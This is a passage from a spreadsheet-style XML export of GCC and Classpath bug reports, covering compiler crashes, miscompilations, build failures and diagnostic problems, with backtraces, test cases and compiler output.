It finally generates instructions to convert from SImode to DImode which are placed to the end of instruction stream and not to the place before loop. See the end of attached debug dump (uu.i.12.loop)
Here is the backtrace:
#0  add_insn (insn=0x2a9589e120) at ../../gcc/emit-rtl.c:3613
#1  0x400a9441 in emit_insn (x=0x2a958a0240) at ../../gcc/emit-rtl.c:4671
#2  0x40148e17 in gen_extendsidi2 (operand0=0x2a958a0220 operand1=0x2a9589e120) at insn-emit.c:9318
#3  0x401ce83d in emit_unop_insn (icode=-1786126048 target=0x7fbfffc570 op0=0x2a956558c0 code=132) at ../../gcc/optabs.c:3029
#4  0x400bb3dd in convert_modes (mode=DImode oldmode=2508849696 x=0x2a956558c0 unsignedp=0) at ../../gcc/expr.c:1435
#5  0x401bbaca in emit_prefetch_instructions (loop=0x405e7d00) at ../../gcc/loop.c:4200
#6  0x401bd47d in strength_reduce (loop=0x405e7d00 flags=6) at ../../gcc/loop.c:5112
#7  0x401b4b81 in scan_loop (loop=0x405e7d00 flags=6) at ../../gcc/loop.c:1166
#8  0x401b274b in loop_optimize (f=0x2a9565f120 dumpfile=0x0 flags=6) at ../../gcc/loop.c:552
#9  0x4023cf2b in rest_of_compilation (decl=0x2a95653540) at ../../gcc/toplev.c:2961
#10 0x4001af11 in c_expand_body (fndecl=0x2a9589e120 nested_p=1077278688 can_defer_p=1) at ../../gcc/c-decl.c:6541
#11 0x4001ab8d in finish_function (nested=0 can_defer_p=1) at ../../gcc/c-decl.c:6412
#12 0x40002830 in yyparse () at c-parse.y:406
#13 0x4000bdf7 in c_common_parse_file (set_yydebug=-1786126048) at ../../gcc/c-lex.c:165
Release:
mainline
Environment:
x86-64 but probably other 64-bit machines too
How-To-Repeat:
Compile attached testcase with -O2 -fprefetch-loop-arrays</t>
  </si>
  <si>
    <t>zlomekj</t>
  </si>
  <si>
    <t>GCC-40531</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/20090618-1.c compilation  -O0</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20090618-1.c  -w  -O0   -lm  
 -o /test/gnu/gcc/objdir/gcc/testsuite/gcc/20090618-1.x0    (timeout = 300)
/usr/ccs/bin/ld: Unsatisfied symbols:
   mempcpy (first referenced in /var/tmp//ccsoEbcj.o) (code)
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/usr/ccs/bin/ld: Unsatisfied symbols:
   mempcpy (first referenced in /var/tmp//ccsoEbcj.o) (code)
collect2: ld returned 1 exit status
FAIL: gcc.c-torture/execute/20090618-1.c compilation  -O0</t>
  </si>
  <si>
    <t>GCC-66319</t>
  </si>
  <si>
    <t>[6 Regression] gcov-tool.c:84:65: error: invalid conversion from 'int (*)(const c har* const stat* int FTW*)' to 'int (*)(const char* const stat* int FTW)'</t>
  </si>
  <si>
    <t>g++ -std=c++98 -c   -g -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwi
nd-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common -Wno-error -DHAVE_CONFIG_H -I. -I. -
I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../l
ibcpp/include -I/opt/gnu/gcc/gmp/include  -I../../gcc/gcc/../libdecnumber -I../.
./gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc/gcc/../libbacktrace 
  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I/opt/gnu/gcc/gmp/include  -I../../gcc/gcc/../libdecnu
mber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc/gcc/../li
bbacktrace  -o libgcov-util.o ../../gcc/gcc/../libgcc/libgcov-util.c
../../gcc/gcc/gcov-tool.c: In function 'int unlink_profile_dir(const char*)':
../../gcc/gcc/gcov-tool.c:84:65: error: invalid conversion from 'int (*)(const c
har* const stat* int FTW*)' to 'int (*)(const char* const stat* int FTW)' 
[-fpermissive]
     return nftw(path unlink_gcda_file 64 FTW_DEPTH | FTW_PHYS)
                                                                 ^
In file included from ../../gcc/gcc/gcov-tool.c:39:0:
/usr/include/ftw.h:240:13: note:   initializing argument 2 of 'int nftw(const ch
ar* int (*)(const char* const stat* int FTW) int int)'
  inline int nftw(const char *aint (*b)(const char * const struct
             ^
make[3]: *** [gcov-tool.o] Error 1
The problem is function declaration of unlink_gcda_file doesn't match
declaration in In file included from ../../gcc/gcc/gcov-tool.c:39:0:
/usr/include/ftw.h:240.  Whether the fourth argument is struct FTW *
or struct FTW depends on compilation defines:
#ifdef _INCLUDE_XOPEN_SOURCE_EXTENDED
        /*
         * Do Mapping of nftw()         */
#if (defined(_XPG4_EXTENDED) &amp;&amp; !defined(_INCLUDE_HPUX_SOURCE)) || defined(_XOPE
N_SOURCE_EXTENDED)
        inline int nftw(const char *aint (*b)(const char *
                const struct stat * int struct FTW *) int c int d)
                        {return __nftw64(abcd)}
#else /* (defined(_XPG4_EXTENDED) &amp;&amp; !defined(_INCLUDE_HPUX_SOURCE)) || defined(
_XOPEN_SOURCE_EXTENDED) */
        inline int nftw(const char *aint (*b)(const char * const struct
                stat * int struct FTW) int c int d)
                        {return __nftw64(abcd)}
#endif /* (defined(_XPG4_EXTENDED) &amp;&amp; !defined(_INCLUDE_HPUX_SOURCE)) || defined
(_XOPEN_SOURCE_EXTENDED) */
#endif /* _INCLUDE_XOPEN_SOURCE_EXTENDED */
Sadly unlink_gcda_file doesn't use this argument.
Probably introduced by
2015-02-09  Trevor Saunders  
        PR gcov-profile/61889
        * config.in: regenerate.
        * configure.in: Likewise.
        * configure.ac: Check for ftw.h.
        * gcov-tool.c: Check for ftw.h before using nftw.
and my switch to building with gcc-5.  There were numerous successful builds
after the above change was applied.</t>
  </si>
  <si>
    <t>GCC-63848</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: c-c++-common/torture/builtin-arith-overflow-17.c   -O0  execution test</t>
  </si>
  <si>
    <t>This fails at any opt level.  Also failing are b-a-o-18.c (t103sub) and b-a-o-6.c (t153add).
Breakpoint 2 bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
17        v++
(gdb) bt
#0  bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
#1  0x4000000000044430 in t132_1add (x=0x3fffffffffffffffffffffffffffffff 
    y=0x40000000000000000000000000000000)
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#2  0x4000000000044c90 in t132add ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#3  0x400000000006e670 in main ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:18
(gdb) c
Continuing.
Breakpoint 2 bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
17        v++
(gdb) bt
#0  bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
#1  0x4000000000044600 in t132_2add (y=0x40000000000000000000000000000000)
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#2  0x4000000000044cf0 in t132add ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#3  0x400000000006e670 in main ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:18
(gdb) c
Continuing.
Breakpoint 2 bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
17        v++
(gdb) bt
#0  bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
#1  0x40000000000449d0 in t132_4add (x=0x3fffffffffffffffffffffffffffffff)
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#2  0x4000000000044db0 in t132add ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#3  0x400000000006e670 in main ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:18
(gdb) c
Continuing.
Breakpoint 2 bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
17        v++
(gdb) bt
#0  bar ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow.h:17
#1  0x4000000000044f70 in t132add ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#2  0x400000000006e670 in main ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:18
(gdb) c
Continuing.
Program received signal SIGABRT Aborted.
0xa000000000040721 in __kernel_syscall_via_break ()
(gdb) bt
#0  0xa000000000040721 in __kernel_syscall_via_break ()
#1  0x20000000001b2ad0 in *__GI_raise (sig=)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:67
#2  0x20000000001b53b0 in *__GI_abort () at abort.c:92
#3  0x40000000000450d0 in t132add ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:10
#4  0x400000000006e670 in main ()
    at /usr/local/gcc/gcc-20141113/gcc/testsuite/c-c++-common/torture/builtin-arith-overflow-17.c:18</t>
  </si>
  <si>
    <t>GCC-7823</t>
  </si>
  <si>
    <t>[ia-64] illegal instruction at -O2 level and above.</t>
  </si>
  <si>
    <t>The little test case supplied produces an illegal
instruction error when using -O2 or higher on an
Itanium machine. Using -O1 works.
On an x86 RedHat Linux machine the same test
case works with -O2 and above with gcc 3.2.
The Itanium optimizer appears to be producing
incorrect code.
Release:
g++ (GCC) 3.2
Environment:
RedHat Linux for Itanium.
kernel 2.4.18-e.0.2smp
glibc 2.2.5
HP Rx4610 quad Itanium machine.
How-To-Repeat:
The following statement errors on an Itanium Linux machine.
The test case supplied being named Test.cc
#  g++ -O2 Test.cc &amp;&amp; a.out</t>
  </si>
  <si>
    <t>GCC-34063</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE: build2_stat at tree.c:3115</t>
  </si>
  <si>
    <t>Platform:
  Fedora release 7 (Moonshine)
  Linux idle.lbl.gov 2.6.22.9-91.fc7 #1 SMP Thu Sep 27 20:47:39 EDT 2007 x86_64
x86_64 x86_64 GNU/Linux
% g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /net/rosie/scratch2/rwgk/gcc_trunk/configure --prefix=/net/cci-filer1/vol1/tmp/rwgk/gcc_trunk_130073_x86_64_fc7 --enable-languages=cc++fortran --with-mpfr=/usr
Thread model: posix
gcc version 4.3.0 20071110 (experimental) (GCC)
I'll upload a small standalone reproducer.
To reproduce the problem:
% g++ -c -O1 ice_build2_stat.cpp
ice_build2_stat.cpp: In function 'void foo()':
ice_build2_stat.cpp:13: internal compiler error: in build2_stat at tree.c:3115
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It works with this alternative command:
  g++ -c ice_build2_stat.cpp
It also works with many other compilers including all older g++.
Ralf</t>
  </si>
  <si>
    <t>RWGrosse-Kunstleve</t>
  </si>
  <si>
    <t>GCC-44491</t>
  </si>
  <si>
    <t>Diagnostic just shows  instead of a locus</t>
  </si>
  <si>
    <t>Based on http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/377859ecc89ea65c
For the following program gfortran just prints:
Error: Incompatible types in DATA statement at (1) attempted conversion of INTEGER(16) to CHARACTER(1)
Expected: gfortran shows the line number.
      character*2 escape /'1B'x/
      end</t>
  </si>
  <si>
    <t>GCC-28675</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE in extract_insn at recog.c:2084 (unrecognizable insn) [arm]</t>
  </si>
  <si>
    <t>We get the following ICE when crosscompiling fbtest from i686-pc-linux-gnu to arm-ep93xx-linux-gnueabi. -O3 breaks -O2 works
[mkl@himalia:~/pengutronix/ptxdist/bug]$ arm-ep93xx-linux-gnueabi-gcc -c -Wall  -O3 -fomit-frame-pointer -o minimal.o minimal.c -save-temps -v
Using built-in specs.
Target: arm-ep93xx-linux-gnueabi
Configured with: /home/mkl/pengutronix/ptxdist/build/toolchain-arm-ep93xx-linux-gnueabi/build-cross/gcc-4.1.1/configure --host=i686-host-linux-gnu --target=arm-ep93xx-linux-gnueabi --prefix=/opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4 --with-local-prefix=/opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/sysroot-arm-ep93xx-linux-gnueabi --with-sysroot=/opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/sysroot-arm-ep93xx-linux-gnueabi --disable-multilib --disable-nls --enable-symvers=gnu --enable-__cxa_atexit --enable-c99 --enable-long-long --enable-shared --enable-threads=posix --enable-languages=cc++
Thread model: posix
gcc version 4.1.1
 /opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/libexec/gcc/arm-ep93xx-linux-gnueabi/4.1.1/cc1 -E -quiet -v minimal.c -Wall -fomit-frame-pointer -O3 -fpch-preprocess -o minimal.i
ignoring nonexistent directory /opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/sysroot-arm-ep93xx-linux-gnueabi/opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/sysroot-arm-ep93xx-linux-gnueabi/include
#include ... search starts here:
#include  search starts here:
 /opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/lib/gcc/arm-ep93xx-linux-gnueabi/4.1.1/include
 /opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/lib/gcc/arm-ep93xx-linux-gnueabi/4.1.1/../../../../arm-ep93xx-linux-gnueabi/include
 /opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/sysroot-arm-ep93xx-linux-gnueabi/usr/include
End of search list.
 /opt/ptxdist-0.10.svn/arm-ep93xx-linux-gnueabi/gcc-4.1.1-glibc-2.4/libexec/gcc/arm-ep93xx-linux-gnueabi/4.1.1/cc1 -fpreprocessed minimal.i -quiet -dumpbase minimal.c -auxbase-strip minimal.o -O3 -Wall -version -fomit-frame-pointer -o minimal.s
GNU C version 4.1.1 (arm-ep93xx-linux-gnueabi)
        compiled by GNU C version 4.1.2 20060729 (prerelease) (Debian 4.1.1-10).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 770ce336670905d74fe72d7a025d3915
minimal.c: In function 'main':
minimal.c:49: error: unrecognizable insn:
(insn 284 119 282 13 (set (reg:HI 14 lr)
        (mem/s:HI (plus:SI (mult:SI (reg/v:SI 1 r1 [orig:122 i ] [122])
                    (const_int 16 [0x10]))
                (reg:SI 6 r6 [orig:114 clut.1 ] [114])) [3 .r+0 S4 A32])) -1 (nil)
    (nil))
minimal.c:49: internal compiler error: in extract_insn at recog.c:2084
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-57837</t>
  </si>
  <si>
    <t>ARM function pointer tailcall miscompilation regression</t>
  </si>
  <si>
    <t>Created attachment 30469
arm.md fix
The fix for PR target/19599 in svn trunk r198928 causes predicated function pointer tailcalls for some ARM targets to lose their predicate and execute unconditionally resulting in a crash or other misbehaviour. I was able to reproduce the miscompilation manifesting as a segfault using -march=armv4t -marm -O3 as below:
gcc -march=armv4t -marm -O3 -o bx-test bx-test.c
----
void baz() {}
void (*bar)() = baz
void foo(int c) {
    if (c == 1) {
        foo(0)
    }
    bar()
}
int main(int argc char **argv) {
    foo(1)
}
----
Today's trunk gives the following asm:
----
foo:
        cmp     r0 #1
        stmfd   sp! {r4 lr}
        ldr     r4 .L8
        ldrne   r3 [r4]
        ldmnefd sp! {r4 lr}
         bx     r3      @ indirect register sibling call
----
Note the bx to an r3 that is uninitialised when r0 == 1 it should actually be a bxne. The bug in arm.md is fairly clear: the %? is missing from two bx instructions so the predicate is omitted. After identifying the bad code I discovered that the issue was raised in review but deemed irrelevant (http://gcc.gnu.org/ml/gcc-patches/2013-05/msg01022.html).
The attached patch fixes the bug for me.</t>
  </si>
  <si>
    <t>GCC-60418</t>
  </si>
  <si>
    <t>[4.9 Regression] 435.gromacs in SPEC CPU 2006 is miscompiled</t>
  </si>
  <si>
    <t>Since r208165 435.gromacs in SPEC CPU 2006 is miscompiled on x32 with
-mx32 -O3 -funroll-loops -ffast-math -fwhole-program -flto=jobserver
-fuse-linker-plugin
The failure is
  Running 435.gromacs ref peak lto default
*** Miscompare of gromacs.out for details see
    /export/project/git/gcc-regression/spec/2006/spec/benchspec/CPU2006/435.grom
acs/run/run_peak_ref_lto.0000/gromacs.out.mis
cat /export/project/git/gcc-regression/spec/2006/spec/benchspec/CPU2006/435.gromacs/run/run_peak_ref_lto.0000/gromacs.out.mis
0002:  3.07684e+02
       3.03594e+02
The result of 3.03594e+02 is outside of tolerance for 3.07684e+02.
I added a static counter in tree_forwarder_block_p for the number of
times returned true above and return false if it is between getenv(from)
and getenv(to).  I noticed that as more basic blocks get removed
the deviation is getting bigger. One removed basic block has
 basic block 3 loop depth 0 count 0 freq 225 maybe hot 
  prev block 2 next block 4 flags: (NEW REACHABLE)
  pred:       2
  succ:       4
and its successor has
 basic block 4 loop depth 1 count 0 freq 2500 maybe hot 
  prev block 3 next block 5 flags: (NEW)
  pred:       3
              6
 starting at line 722 
# gimple_phi 
Is is safe to remove basic block 3?</t>
  </si>
  <si>
    <t>GCC-54795</t>
  </si>
  <si>
    <t>global-buffer-overflow in lto_write_options</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 191825 configured with
--prefix=/usr/local --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --with-build-config=bootstrap-lto --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc
failed to profiledbootstrap:
/tmp/ccFJkgbJ.s: Assembler messages:
/tmp/ccFJkgbJ.s:752755: Error: invalid character (0x83) in mnemonic
make[7]: *** [/tmp/ccSxjzh4.ltrans14.ltrans.o] Error 1
It happens at random.</t>
  </si>
  <si>
    <t>GCC-67333</t>
  </si>
  <si>
    <t>[C++11][constexpr] constexpr functions incorrectly prohibit taking references to volatile types</t>
  </si>
  <si>
    <t>GCC 4.7.3 (at least) through GCC 6.0 reject the following due to meow has side-effects:
#include 
#include 
template 
constexpr std::size_t lengthof(const volatile T (&amp;)[S])
{
    return S
}
int main()
{
    volatile int meow[4]
    static_cast(meow) // shut up warning
    return static_cast(std::integral_constant&lt;std::size_t
        lengthof(meow)&gt;::value)
}
I believe that this is legal per [expr.const] in the Standard because the volatile parameter is never used in an lvalue-to-rvalue conversion which is what [expr.const] disallows in constant-expressions for volatile types.  Clang versions that understand this code accept it Visual C++ 2015 does as well.
Someone who replied to my question on the std-discussion mailing list suggested that this is also technically legal as well:
#include 
constexpr int Test(int x)
{
    volatile int v = x
    return x
}
int main()
{
    return std::integral_constant::value
}
GCC also rejects this but Clang accepts this as well.  Any attempt to read v will fail though so Clang is enforcing the rule.  I'm not on my Windows machine as I write this so I can't check MSVC.</t>
  </si>
  <si>
    <t>myriachan</t>
  </si>
  <si>
    <t>GCC-38973</t>
  </si>
  <si>
    <t>Missing feature documentation</t>
  </si>
  <si>
    <t>The website
http://gcc.gnu.org/projects/cxx0x.html
claims that the New character types N2249
C++0x extension is not supported by any
version of GCC. But GCC 4.4.0 supports the
u8 u and U string prefixes. :-)</t>
  </si>
  <si>
    <t>GCC-6629</t>
  </si>
  <si>
    <t>gcc 3.1 20020509 exception handling bug</t>
  </si>
  <si>
    <t>gcc 3.1 20020509 exception handling does not
work properly under Linux.
For full details see 0README in the attached
file.
This is similar to the gcc 3.0.4 bug reported
under GNATS id 6602.
Release:
gcc (GCC) 3.1 20020509 (prerelease)
Environment:
RedHat 7.1 on Intel
How-To-Repeat:
Unpack the attached file and run the make command.</t>
  </si>
  <si>
    <t>rwgk</t>
  </si>
  <si>
    <t>GCC-55274</t>
  </si>
  <si>
    <t>gcc build hangs on HP-UX 11.11</t>
  </si>
  <si>
    <t>Created attachment 28661
a fix for hung build on HP-UX 11.11
On HP-UX 11.11 gcc build hangs. $(SHLIB_MAPFILES) is empty cat with empty
imput tries to read stdin and that results in the hang. I'm attaching a patch
to fix the problem.</t>
  </si>
  <si>
    <t>GCC-82683</t>
  </si>
  <si>
    <t>Combine: GCC generates bad code with -tune=thunderx2t99</t>
  </si>
  <si>
    <t>Created attachment 42448
Test case
I am compiling the GCC spec 2017 benchmark on aarch64.  If I compile it with -tune=thunderxt88 it works and if I compile with -tune=thunderx2t99 it fails.
The tune option should affect the speed of a program on different architectures but it should never result in bad code.
I have attached a cutdown testcase (compilable but not runnable) to show the problem.  In the good case you should see two sxtw sign extend instructions:
        sxtw    x20 w0 
        cbz     x1 .L2 
        ldr     w0 [x1 x20 lsl 2]
        sxtw    x20 w0 // 21   
.L2:
In the bad case we only get one:
        sxtw    x20 w0 
        cbz     x1 .L2 
        ldr     w0 [x1 x20 lsl 2]
.L2
If I insert the missing sxtw by hand everything works fine for me.  The sxtw
seems to go missing during combine but I do not know why.  Notice that in
addition to not doing the sxtw we leave the loaded value in w0 and do not
put it in x20 like the good code does.
In addition to the -tune argument I am compiling with:
-std=c11 -O2 -fno-inline -fno-schedule-insns -fno-schedule-insns2 -fno-strict-aliasing</t>
  </si>
  <si>
    <t>CLASSPATH-17463</t>
  </si>
  <si>
    <t>new methods introduced in JDK 1.4 missing in java.awt.Window</t>
  </si>
  <si>
    <t>The following methods introduced in JDK 1.4 are still missing in 
java.awt.Window: 
createBufferStrategy(int) 
createBufferStrategy(int java.awt.BufferCapabilities) 
getBufferStrategy() 
getMostRecentFocusOwner() 
isActive() 
isFocused() 
setLocationRelativeTo(java.awt.Component)</t>
  </si>
  <si>
    <t>GCC-12215</t>
  </si>
  <si>
    <t>[3.3 regression] ICE in make_label_edge with -fnon-call-exceptions -fno-gcse -O2</t>
  </si>
  <si>
    <t>The following code triggers an ICE in the 3.3.1 release:
/dept/rnd/vendor/gcc-3.3.1-notpatched/bin/g++ -E gcc331_ie.C &gt; gcc331_ie.ii
/dept/rnd/vendor/gcc-3.3.1-notpatched/bin/g++ -fnon-call-exceptions -fno-gcse
-O2  gcc331_ie.ii -o gcc331_ie
gcc331_ie.C: In function `int main(int const char**)':
gcc331_ie.C:39: internal compiler error: in make_label_edge at cfgbuild.c:238
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
---------
#include 
void getArg( int &amp;i int argc const char **argv float &amp;arg0 )
{
    if ( i &lt; argc )
    {
        arg0 = atof( argv[i++] )
    }
}
int main (int argc const char **argv)
{
    float               val = 0.0
    int                 i = 1
    //
    // Parse the arguments
    //
    try {
        while ( i &lt; argc )
        {
            std::string arg( argv[i++])
            if ( arg == - )
            {
                int e=0
                throw( e )
            }
            else if ( arg == -op )
            {
                getArg( i argc argv val )
            }
        }
    } catch (...) {
    }
    return 0
}
-----
It compiles with 3.2.3.  It also compiles if gcse is enabled but
bug 11646 is keeping us from doing that with the rest of the code :/
-nick</t>
  </si>
  <si>
    <t>GCC-24820</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 regression] SEGV in integer_valued_real_p at gcc/builtins.c:6711</t>
  </si>
  <si>
    <t>// Compile this with -O2 -ffast-math to get segfault
double floor (double)
double bar (double sum)
{
  int i
  for (i = 0 i &lt; 256 i++)
    sum += floor (0.5 + (i - 128))
  return sum
}</t>
  </si>
  <si>
    <t>GCC-23984</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] second operand of PLUS_EXPR is NULL (in constructor)</t>
  </si>
  <si>
    <t>cc1plus crashes for the testcase I'll attach later.  There is a PLUS_EXPR the
second operand of which is NULL. setting a breakpoint cgraph_lower_function
shows that the crash happens after cgraph_lower_function is called a second time
moreover the by probing the different addresses where the PLUS_EXPR ended up
during multiple runs the offending PLUS_EXPR can be found at the start of
the second cgraph_lower_function call:
(gdb) p ((tree)0xb595ff9c)-&gt;common.code
$7 = PLUS_EXPR
(gdb) call debug_tree((tree)0xb595ff9c)
 &lt;plus_expr 0xb595ff9c
    type &lt;pointer_type 0xb595eb24
        type 
            sizes-gimplified unsigned SI
            size 
            unit size 
            align 32 symtab 0 alias set -1
            pointer_to_this &gt;
        unsigned SI size  unit size &lt;integer_cst
0xb58ab180 4&gt;
        align 32 symtab 0 alias set -1&gt;
    readonly
    arg 0 
        used unsigned ignored SI file foo.ii line 30 size &lt;integer_cst
0xb58ab3f0 32&gt; unit size 
        align 32 context  abstract_origin
        chain 
            used unsigned ignored SI file foo.ii line 30 size &lt;integer_cst
0xb58ab3f0 32&gt; unit size 
            align 32 context 
abstract_origin  chain &gt;&gt;&gt;
Strangely enough the this PLUS_EXPRESSION appears not to have been made by
make_node_stat.</t>
  </si>
  <si>
    <t>GCC-7062</t>
  </si>
  <si>
    <t>Segmentation fault on type_info</t>
  </si>
  <si>
    <t>I've got a segmentation fault when dereferencing a type_info object at runtime.
Release:
gcc version 2.95.4 20011006 (Debian prerelease)
Environment:
Linux 2.2.19pre17 i686</t>
  </si>
  <si>
    <t>GCC-9815</t>
  </si>
  <si>
    <t>atomicity.h - fails to compile with -O3 -masm=intel</t>
  </si>
  <si>
    <t>C:\Temp/cceyaaaa.s: Assembler messages:
C:\Temp/cceyaaaa.s:59: Error: no such instruction: `xaddl ebxDWORD PTR [eax-4]'
C:\Temp/cceyaaaa.s:199: Error: no such instructio
n: `addl eaxDWORD PTR [ecx]'
Release:
gcc-3.2.2 (mingw special 20030208-1)
Environment:
x86 win32 (windows 2000 pro)
How-To-Repeat:
a.cpp:
#include 
int main(int argc char *argv[])
{
  std::string a=a
}
Command line:
gcc -O3 a.cpp -lstdc++ -masm=intel</t>
  </si>
  <si>
    <t>kfoltman</t>
  </si>
  <si>
    <t>GCC-12815</t>
  </si>
  <si>
    <t>[3.3 Regression] Code compiled with optimization behaves unexpectedly</t>
  </si>
  <si>
    <t>$ cat &gt;test.cpp
#include 
#include 
using std::cerr
using std::endl
bool
operator== (std::type_info const* pa std::type_info const&amp; b)
{
  return *pa == b
}
struct A
{
  virtual
  ~A () {}
}
struct APtr
{
  APtr (A* p)
      : p_ (p)
  {
  }
  A&amp;
  operator* () const
  {
    return *p_
  }
private:
  A* p_
}
int
main ()
{
  APtr ap (new A)
  for(bool cont__ = true cont__)
  {
    cerr &lt;&lt; outer: cont__  &lt;&lt; cont__ &lt;&lt; endl
    for(std::type_info const* const exp__ ((
        cont__
        cont__ = false)
    {
      cerr &lt;&lt; inner: cont__  &lt;&lt; cont__ &lt;&lt; endl
      if(cont__ &amp;&amp;
         exp__ == (typeid (int)) &amp;&amp;
         (cont__ = false true))
      {
        cerr &lt;&lt; condition &lt;&lt; endl        
      }
    }
  }
}
$ g++ --version
g++ (GCC) 3.3.2 (Debian)
$ g++ ./test.cpp
$ ./a.out
outer: cont__ 1
inner: cont__ 1
$ g++ -O ./test.cpp
$ ./a.out # will result in infinite loop
outer: cont__ 1
inner: cont__ 1
inner: cont__ 1
inner: cont__ 1
inner: cont__ 1
inner: cont__ 1
inner: cont__ 1
^C
$</t>
  </si>
  <si>
    <t>GCC-25996</t>
  </si>
  <si>
    <t>[gomp] ICE on undefined iteration variable</t>
  </si>
  <si>
    <t>Compiling the following invalid testcase with -fopenmp causes an ICE:
===================================
void foo()
{
#pragma omp parallel for
  for ( i=0 i&lt;1 ++i ) 
}
===================================
bug.c: In function 'foo':
bug.c:4: error: 'i' undeclared (first use in this function)
bug.c:4: error: (Each undeclared identifier is reported only once
bug.c:4: error: for each function it appears in.)
bug.c:4: error: invalid type for iteration variable ''
bug.c:4: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in c_finish_omp_for at c-omp.c:210
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-45085</t>
  </si>
  <si>
    <t>[4.6 Regression] incorrect -Wuninitialized warning</t>
  </si>
  <si>
    <t>I'm using a relatively recent svn trunk gcc on an x86 Fedora 13 machine.
I'm trying to compile gdb with it.  I got this error:
../../archer/gdb/remote.c: In function â€˜remote_waitâ€™:
../../archer/gdb/remote.c:5561:10: error: â€˜event_ptid.tidâ€™ may be used uninitialized in this function [-Werror=uninitialized]
../../archer/gdb/remote.c:5561:10: error: â€˜event_ptid.lwpâ€™ may be used uninitialized in this function [-Werror=uninitialized]
../../archer/gdb/remote.c:5561:10: error: â€˜event_ptid.pidâ€™ may be used uninitialized in this function [-Werror=uninitialized]
cc1: all warnings being treated as errors
But the body of remote_wait is simple:
{
  ptid_t event_ptid
  if (non_stop)
    event_ptid = remote_wait_ns (ptid status options)
  else
    event_ptid = remote_wait_as (ptid status options)
  if (target_can_async_p ())
    {
      /* If there are are events left in the queue tell the event loop
	 to return here.  */
